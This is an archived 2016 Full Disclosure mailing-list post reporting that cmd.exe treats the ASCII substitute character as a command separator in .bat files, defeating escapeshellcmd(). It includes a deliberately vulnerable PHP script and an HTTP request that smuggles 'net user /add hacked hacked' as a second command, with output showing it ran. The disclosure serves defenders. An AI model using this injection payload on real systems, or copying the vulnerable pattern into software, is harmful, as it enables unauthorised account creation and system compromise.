| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAN78G5q6odH1BhOEgwpRROXg8ethwSkS8eCruT+Bn-+Jr+uk4w@mail.gmail.com>
Date: Fri, 11 Nov 2016 21:49:07 +0000
From: Julian Horoszkiewicz <ewilded@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Unexpected behavior of cmd.exe while processing .bat files
leads to potential command injection vulnerabilities
Unexpected behavior of cmd.exe while processing .bat files leads to
potential command injection vulnerabilities
Tested on: Windows 7, Windows 10
Author: Julian Horoszkiewicz
It was discovered that cmd.exe, when processing .bat files, treats the
ASCII substitute character (code 26) as a command separator (like & or |).
This opens the way for unexpected command injection vulnerabilities in
applications which generate .bat files based on user input, as this
character is not filtered by most application input sanitisers against
command injection.
PoC:
Let's assume the following PHP script (note the use of well known
escapeshellcmd() function, known as a safe way to sanitise user input
before using it as a command argument):
<?php
$command = 'dir '.$_POST['dir'];
$escaped_command = escapeshellcmd($command);
file_put_contents('out.bat',$escaped_command);
system('out.bat');
?>
Let's send a request containing "." as a parameter to the hardcoded "dir"
command, appended with another command - taking advantage of %1a as a
command separator:
POST /escape_shell_cmd.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101
Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
dir=.%1anet user /add hacked hacked
The response:
HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP
Content-Length: 977
Connection: close
Content-Type: text/html; charset=UTF-8
C:\wamp64\www>dir .
Volume in drive C has no label.
Volume Serial Number is 22C1-AD4C
Directory of C:\wamp64\www
24.07.2016 17:22 <DIR> .
24.07.2016 17:22 <DIR> ..
[...]
C:\wamp64\www>net user /add hacked hacked
Command executed successfully.
To double check, we look the new user up in the command line once again:
C:\Users\win>net user hacked
User name hacked
Full name
[...]
So, it seems that every piece of software generating .bat files from user
input is potentially vulnerable - it does not pertain to PHP and
escapeshellcmd specifically, but rather to cmd.exe itself.
More on alternative command injection payloads:
https://github.com/ewilded/shelling
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists